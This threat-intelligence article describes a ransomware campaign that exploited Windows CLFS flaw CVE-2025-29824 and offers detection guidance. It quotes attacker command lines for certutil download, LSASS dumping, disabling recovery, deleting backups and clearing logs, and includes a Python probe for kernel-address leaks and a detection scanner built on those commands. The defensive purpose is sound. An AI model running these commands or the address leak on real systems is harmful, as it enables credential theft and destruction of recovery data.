A wave of ransomware activity has recently hit organizations in several countries by exploiting an elevation of privilege vulnerability in the Windows Common Log File System (CLFS) driver that was unpatched at the time. The zero-day, tracked as CVE-2025-29824, was leveraged by the threat actor Microsoft tracks as Storm-2460, a reminder of how a single local privilege escalation flaw can turn initial access into a full ransomware outbreak. The campaign affected targets in the United States, Venezuela, Spain, and Saudi Arabia, spanning the IT, real estate, financial, software, and retail sectors.
In this report, we break down the exploitation technique, post-compromise behavior, ransomware deployment, and strategic insights offered by Microsoft’s threat intelligence. We also provide 10 essential recommendations for organizations to defend themselves against such advanced threats.
Inside the Exploitation of CVE-2025-29824: A Technical Breakdown
The Vulnerability: CVE-2025-29824
The Common Log File System (CLFS) is a Windows kernel component (the clfs.sys driver) that provides general-purpose logging to kernel-mode and user-mode clients. On April 8, 2025, Microsoft patched an elevation of privilege (EoP) vulnerability in this driver that was already being exploited in the wild. The flaw allowed a local attacker running with standard user privileges to escalate to SYSTEM, effectively taking control of the machine.
The issue is a use-after-free (CWE-416) in the driver's handling of log files. Storm-2460's exploit turns that memory-safety bug into kernel memory corruption and uses it to rewrite the exploiting process's token, so that the process ends up with elevated privileges.
Pre-Exploitation Techniques
Although the initial infection vector remains unconfirmed, forensic data points to classic tradecraft:
- Certutil abuse: The threat actor used `certutil.exe`, a signed Windows binary, to download malware from a legitimate third-party website that had been compromised.
- MSBuild payload delivery: The downloaded file was a malicious MSBuild project. Its inline task decrypted an embedded payload and executed it through the `EnumCalendarInfoA` API callback, so the loader ran in memory inside the trusted `MSBuild.exe` process.
This payload was PipeMagic, a modular, plugin-based backdoor that has been paired with zero-day exploits before: ESET observed it in 2023, and Kaspersky documented it in detail in October 2024.
One domain associated with this campaign, `aaaaabbbbbbb.eastus.cloudapp.azure[.]com`, has since been taken offline.
The Exploit in Action
Once PipeMagic was running, the CLFS exploit was launched through `dllhost.exe` and executed entirely in memory, so the exploit code never touched disk. The exploit first called the `NtQuerySystemInformation` API to leak kernel addresses, a necessary step for defeating Kernel Address Space Layout Randomization (KASLR).
Microsoft had already hardened this API in Windows 11, version 24H2: the information classes the exploit relies on are now only available to callers holding SeDebugPrivilege. A standard user does not have that privilege, so the exploit does not work on 24H2 even though the CLFS bug itself still had to be patched there; the hardening removes the address leak the exploit chain depended on, not the bug.
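To see whether a given Windows build still hands kernel addresses to an unprivileged caller, you can make the same call the exploit makes. The following Python script is an added example, not code from Microsoft's report or from Storm-2460's toolkit. It queries `SystemModuleInformation` (information class 11) through ctypes from a plain user process and reports whether the image base of `ntoskrnl.exe` came back. The `kaslr_leak_blocked` and `kernel_base` helpers are the example's own; `kaslr_leak_blocked` assumes that a hardened build either refuses the call with STATUS_ACCESS_DENIED or returns the module list with every ImageBase zeroed, and treats both outcomes as blocked, since which one you observe is build-dependent.

```python
import ctypes
import sys
from typing import Dict, List, Optional, Tuple

# NTSTATUS codes and the information class the exploit used for its KASLR bypass.
STATUS_SUCCESS = 0x00000000
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
STATUS_ACCESS_DENIED = 0xC0000022
SYSTEM_MODULE_INFORMATION = 11  # returns RTL_PROCESS_MODULES, including ntoskrnl's ImageBase


class RTL_PROCESS_MODULE_INFORMATION(ctypes.Structure):
    """One loaded kernel module, as laid out by ntdll (undocumented but stable)."""
    _fields_ = [
        ("Section", ctypes.c_void_p),
        ("MappedBase", ctypes.c_void_p),
        ("ImageBase", ctypes.c_void_p),      # the kernel address an exploit is after
        ("ImageSize", ctypes.c_ulong),
        ("Flags", ctypes.c_ulong),
        ("LoadOrderIndex", ctypes.c_ushort),
        ("InitOrderIndex", ctypes.c_ushort),
        ("LoadCount", ctypes.c_ushort),
        ("OffsetToFileName", ctypes.c_ushort),
        ("FullPathName", ctypes.c_char * 256),
    ]


class RTL_PROCESS_MODULES(ctypes.Structure):
    """Buffer header; 'Modules' is really NumberOfModules entries long."""
    _fields_ = [
        ("NumberOfModules", ctypes.c_ulong),
        ("Modules", RTL_PROCESS_MODULE_INFORMATION * 1),
    ]


def query_kernel_modules() -> Optional[Dict[str, object]]:
    """Call NtQuerySystemInformation(SystemModuleInformation) the way an exploit would.

    Returns None when not running on Windows. On Windows returns
    {"status": "ok" | "access_denied", "modules": [(file_name, image_base), ...]}.
    """
    if sys.platform != "win32":
        return None
    fn = ctypes.WinDLL("ntdll").NtQuerySystemInformation
    fn.restype = ctypes.c_ulong  # NTSTATUS read as unsigned so 0xC000xxxx compares directly
    fn.argtypes = [ctypes.c_ulong, ctypes.c_void_p, ctypes.c_ulong,
                   ctypes.POINTER(ctypes.c_ulong)]

    # First call with an empty buffer only to learn the required size.
    needed = ctypes.c_ulong(0)
    status = fn(SYSTEM_MODULE_INFORMATION, None, 0, ctypes.byref(needed))
    if status == STATUS_ACCESS_DENIED:
        return {"status": "access_denied", "modules": []}
    if status != STATUS_INFO_LENGTH_MISMATCH:
        raise OSError(f"NtQuerySystemInformation failed with NTSTATUS 0x{status:08X}")

    buf = ctypes.create_string_buffer(needed.value)
    status = fn(SYSTEM_MODULE_INFORMATION, buf, needed.value, ctypes.byref(needed))
    if status == STATUS_ACCESS_DENIED:
        return {"status": "access_denied", "modules": []}
    if status != STATUS_SUCCESS:
        raise OSError(f"NtQuerySystemInformation failed with NTSTATUS 0x{status:08X}")

    count = ctypes.c_ulong.from_buffer(buf).value
    first = RTL_PROCESS_MODULES.Modules.offset      # accounts for x64 alignment padding
    stride = ctypes.sizeof(RTL_PROCESS_MODULE_INFORMATION)
    modules: List[Tuple[str, int]] = []
    for i in range(count):
        m = RTL_PROCESS_MODULE_INFORMATION.from_buffer(buf, first + i * stride)
        name = m.FullPathName[m.OffsetToFileName:].decode("ascii", errors="replace")
        modules.append((name, m.ImageBase or 0))
    return {"status": "ok", "modules": modules}


def kaslr_leak_blocked(result: Dict[str, object]) -> bool:
    """True when the caller did not obtain any kernel image base.

    Assumption of this example: a hardened build either refuses the call
    (STATUS_ACCESS_DENIED) or zeroes every ImageBase; both count as blocked.
    """
    if result["status"] == "access_denied":
        return True
    return all(base == 0 for _, base in result["modules"])


def kernel_base(result: Dict[str, object]) -> int:
    """Image base of ntoskrnl.exe if it leaked, else 0."""
    for name, base in result["modules"]:
        if name.lower() == "ntoskrnl.exe":
            return base
    return 0


if __name__ == "__main__":
    r = query_kernel_modules()
    if r is None:
        print("not Windows; nothing to check")
    elif kaslr_leak_blocked(r):
        print("kernel addresses withheld from this caller")
    else:
        print(f"kernel base leaked to an unprivileged caller: 0x{kernel_base(r):016X}")
```

Run it from a non-elevated prompt, i.e. without SeDebugPrivilege. On Windows 11 24H2 it should report the addresses as withheld; on Windows 10 or Windows 11 23H2 it prints the real kernel base, which is exactly the value the exploit needs, and the April 2025 CLFS patch does not change that because the hardening lives in `NtQuerySystemInformation`, not in clfs.sys. Off Windows the query returns None so the helpers can still be imported and unit-tested.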
Once addresses were leaked, the exploit:
- Corrupted kernel memory structures through the CLFS bug.
- Called `RtlSetAllBits` to overwrite the exploit process's token with `0xFFFFFFFF`, enabling every privilege for the process.
- Used those privileges to inject a payload into `winlogon.exe`, a SYSTEM process.
During exploitation a CLFS base log file (BLF) was created at `C:\ProgramData\SkyPDF\PDUDrv.blf`. The presence of this file is a forensic indicator of compromise (IoC) for execution of the exploit.
Post-Exploitation: Credential Dumping & Ransomware Deployment
With SYSTEM-level access secured, the attackers dumped LSASS using Sysinternals' `procdump.exe`, renamed to `dllhost.exe` so that it would blend in with the legitimate COM surrogate of the same name:
`dllhost.exe -accepteula -r -ma lsass.exe c:\programdata\[random]`
The switches are ProcDump's own: `-ma` writes a full memory dump, `-r` takes the dump from a cloned (reflected) copy of the process, and `-accepteula` suppresses the licence prompt. The dump gave Storm-2460 credentials for lateral movement and persistence. Note that the genuine `dllhost.exe` only ever runs with a `/Processid:{GUID}` argument, so any other command line under that image name deserves an alert.
Shortly after, ransomware was deployed:
- Files were encrypted.
- A random file extension was appended to each encrypted file.
- A ransom note named `!_READ_ME_REXX2_!.txt` was dropped.
Microsoft linked the activity to the RansomEXX ransomware family, citing behavioural similarities and the inclusion of known `.onion` domains:
`jbdg4buq6jd7ed3rd6cynqtq5abttuekjnxqrqyvk4xam5i7ld33jvqd.onion`
`uyhi3ypdkfeymyf5v35pbk3pz7st3zamsbjzf47jiqbcm3zmikpwf3qd.onion`
Other indicators included:
- Launching the ransomware as `dllhost.exe --do C:\foobar`, again a renamed binary masquerading as the COM surrogate.
- Disabling Windows recovery: `bcdedit /set {default} recoveryenabled no`
- Deleting the backup catalog: `wbadmin delete catalog -quiet`
- Clearing event logs: `wevtutil cl Application`
- In one case, spawning `notepad.exe` as SYSTEM, apparently to evade detection.
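The command lines and the BLF path above are specific enough to hunt for directly. The following Python script is an added example, not Microsoft's Sentinel queries or anything from the report. It encodes the pre-exploitation steps (a certutil download, an MSBuild project run from a user-writable path) and the post-exploitation ones (the BLF path, ProcDump's `-ma lsass` switch set under any image name, `dllhost.exe` with a command line the real COM surrogate never has, and the recovery-inhibition commands) as rules over a constructed, inline set of process and file events. The event shape, the `http://example.invalid` URL, the placeholder `/Processid` GUID, the `c:\programdata\abc123` dump name and the `USER_WRITABLE` heuristic are all assumptions of the example.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample telemetry, not real logs: one record per process-creation or
# file-creation event, roughly the shape of a Sysmon or EDR export. e1-e8 replay the
# command lines and the BLF path from the report; e9 and e10 are benign noise.
SAMPLE_EVENTS: List[Event] = [
    {"id": "e1", "type": "process", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://example.invalid/stage.proj C:\ProgramData\stage.proj"},
    {"id": "e2", "type": "process", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"MSBuild.exe C:\ProgramData\stage.proj"},
    {"id": "e3", "type": "file", "image": r"C:\Windows\System32\dllhost.exe",
     "path": r"C:\ProgramData\SkyPDF\PDUDrv.blf"},
    {"id": "e4", "type": "process", "image": r"C:\ProgramData\dllhost.exe",
     "cmdline": r"dllhost.exe -accepteula -r -ma lsass.exe c:\programdata\abc123"},
    {"id": "e5", "type": "process", "image": r"C:\ProgramData\dllhost.exe",
     "cmdline": r"dllhost.exe --do C:\foobar"},
    {"id": "e6", "type": "process", "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": r"bcdedit /set {default} recoveryenabled no"},
    {"id": "e7", "type": "process", "image": r"C:\Windows\System32\wbadmin.exe",
     "cmdline": r"wbadmin delete catalog -quiet"},
    {"id": "e8", "type": "process", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": r"wevtutil cl Application"},
    {"id": "e9", "type": "process", "image": r"C:\Windows\System32\dllhost.exe",  # real COM surrogate, placeholder GUID
     "cmdline": r"C:\Windows\system32\DllHost.exe /Processid:{00000000-0000-0000-0000-000000000000}"},
    {"id": "e10", "type": "process", "image": r"C:\Windows\System32\certutil.exe",  # legitimate hashing use
     "cmdline": r"certutil.exe -hashfile C:\tmp\setup.msi SHA256"},
]


def _image(e: Event) -> str:
    """Bare executable name, lower-cased, from the image path."""
    return e.get("image", "").rsplit("\\", 1)[-1].lower()


def _cmd(e: Event) -> str:
    return e.get("cmdline", "").lower()


def _path(e: Event) -> str:
    return e.get("path", "").lower()


# Directories a standard user can write to; a build tool fed a project from here is a red flag.
USER_WRITABLE = re.compile(r"\\(programdata|users\\[^\\]+\\appdata|windows\\temp)\\", re.I)
# ProcDump's "-ma <target>" aimed at lsass, whatever the binary was renamed to.
PROCDUMP_LSASS = re.compile(r"(^|\s)-ma\s+lsass(\.exe)?(\s|$)")
BLF_IOC = r"c:\programdata\skypdf\pdudrv.blf"

RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("certutil_download", lambda e: e.get("type") == "process" and _image(e) == "certutil.exe"
        and ("-urlcache" in _cmd(e) or "http" in _cmd(e))),
    ("msbuild_user_writable_project", lambda e: e.get("type") == "process" and _image(e) == "msbuild.exe"
        and USER_WRITABLE.search(e.get("cmdline", "")) is not None),
    # The exact path from the report, plus any .blf staged under ProgramData.
    ("clfs_blf_staging", lambda e: e.get("type") == "file"
        and (_path(e) == BLF_IOC or (_path(e).endswith(".blf") and "\\programdata\\" in _path(e)))),
    ("lsass_dump_procdump_args", lambda e: e.get("type") == "process"
        and PROCDUMP_LSASS.search(_cmd(e)) is not None),
    # The genuine COM surrogate only ever takes /Processid:{GUID}; anything else is a renamed binary.
    ("dllhost_unexpected_args", lambda e: e.get("type") == "process" and _image(e) == "dllhost.exe"
        and "/processid:" not in _cmd(e)),
    ("recovery_disabled", lambda e: e.get("type") == "process" and _image(e) == "bcdedit.exe"
        and re.search(r"recoveryenabled\s+no\b", _cmd(e)) is not None),
    ("backup_catalog_deleted", lambda e: e.get("type") == "process" and _image(e) == "wbadmin.exe"
        and "delete catalog" in _cmd(e)),
    ("eventlog_cleared", lambda e: e.get("type") == "process" and _image(e) == "wevtutil.exe"
        and re.search(r"\b(cl|clear-log)\b", _cmd(e)) is not None),
]

# Which phase of the chain each rule evidences; the triage signal is how many phases co-occur.
STAGE_OF = {
    "certutil_download": "delivery", "msbuild_user_writable_project": "delivery",
    "clfs_blf_staging": "privilege_escalation", "dllhost_unexpected_args": "masquerading",
    "lsass_dump_procdump_args": "credential_access", "eventlog_cleared": "defense_evasion",
    "recovery_disabled": "impact", "backup_catalog_deleted": "impact",
}
STAGE_ORDER = ["delivery", "privilege_escalation", "masquerading",
               "credential_access", "defense_evasion", "impact"]


def scan(events: List[Event]) -> Dict[str, List[str]]:
    """Return {rule_name: [ids of matching events]} for every rule that fired."""
    hits: Dict[str, List[str]] = {}
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.setdefault(name, []).append(e["id"])
    return hits


def stages_seen(hits: Dict[str, List[str]]) -> List[str]:
    """Distinct chain phases present in the hits, in kill-chain order."""
    seen = {STAGE_OF[rule] for rule in hits}
    return [s for s in STAGE_ORDER if s in seen]


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for rule, ids in found.items():
        print(f"{rule:32s} {ids}")
    print("stages:", stages_seen(found))
```

Feed `scan` your own process-creation (Sysmon Event ID 1 or Security 4688) and file-creation (Sysmon Event ID 11) records with the same `image`, `cmdline` and `path` fields. Individually, `eventlog_cleared` or `backup_catalog_deleted` can be an administrator at work; `stages_seen` is the escalation signal, because a host that shows delivery, credential access and impact within a short window is not a false positive.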
Victims and Scope of Impact
Known Targets:
- USA: IT and real estate sectors
- Venezuela: Financial institutions
- Spain: A major software development company
- Saudi Arabia: Retail operations
While Microsoft has stated the number of targeted organizations is small, the sophistication and strategic geographic dispersion suggest a targeted, financially motivated campaign.
Detection and Threat Intelligence
Microsoft Defender detection names:
- `SilverBasket` (Win64/Windows)
- `MSBuildInlineTaskLoader.C` (Script/Windows)
- `SuspClfsAccess` (Win32/Windows)
Defender for Endpoint Alerts:
- Suspicious access to LSASS
- Potential DLL injection
- Ransomware behavior in file system
- File backup deletions
Microsoft Sentinel Queries:
- BLF file creation detection
- LSASS dumping activity
- Detection of encrypted files with random extensions
Microsoft recommends Security Copilot and Defender XDR users leverage prebuilt playbooks and analytics to automate detection and response activities associated with this threat.
10 Key Recommendations to Prevent Future Exploitation
- Apply security updates promptly: Prioritize patches for elevation of privilege vulnerabilities, especially those already exploited in the wild (e.g., CVE-2025-29824).
- Upgrade to hardened OS versions: Windows 11, version 24H2, restricts the `NtQuerySystemInformation` information classes this exploit used to callers holding SeDebugPrivilege, which blocks the current exploit chain.
- Enable cloud-delivered AV protection: Real-time cloud intelligence can block new threats before signatures are distributed.
- Use EDR in block mode: Even where Defender Antivirus runs in passive mode, EDR in block mode can remediate malicious artifacts it detects post-compromise.
- Restrict dual-use utilities: Block or constrain `certutil.exe`, `MSBuild.exe`, and PowerShell where they are not needed, for example with AppLocker or WDAC rules; the first two were the delivery mechanism in this chain.
- Harden LSASS: Enable LSA protection (run LSASS as a protected process via the `RunAsPPL` setting) and Credential Guard so that user-mode dumpers such as ProcDump cannot read its memory.
- Audit `dllhost.exe` activity: The legitimate COM surrogate runs with a `/Processid:{GUID}` argument and is typically started by `svchost.exe`; any other command line, an image path outside `System32`, or an unusual parent should raise an immediate alert.
- Segment critical assets: Use network segmentation and access control lists to limit lateral movement after privilege escalation.
- Log everything, then retain it off-host: Enable detailed logging and forward it to a collector with long-term retention, so that `wevtutil cl` on the endpoint does not erase the evidence. Attackers routinely clear local logs post-compromise.
- Train and simulate: Conduct regular red team and tabletop exercises that simulate zero-day exploitation to test detection and response workflows.
Conclusion
The exploitation of CVE-2025-29824 by Storm-2460 and the ransomware that followed show how quickly a local privilege escalation bug becomes a fleet-wide incident. The chain used trusted Windows utilities for delivery, an in-memory kernel exploit for escalation, a renamed ProcDump for credential theft, and standard recovery-inhibition commands before encryption; every one of those steps leaves a trace that can be detected.
This incident highlights why zero-day vulnerabilities, particularly those allowing privilege escalation, are so valuable to ransomware actors. For defenders, the takeaway is clear: rapid patching, defense-in-depth, and monitoring of the living-off-the-land steps that surround the exploit are essential.
The cybersecurity community must remain vigilant, because attackers need only one working vulnerability while defenders must cover them all.
Stay updated with CyberCory for the latest threat intelligence, cybersecurity trends, and actionable insights.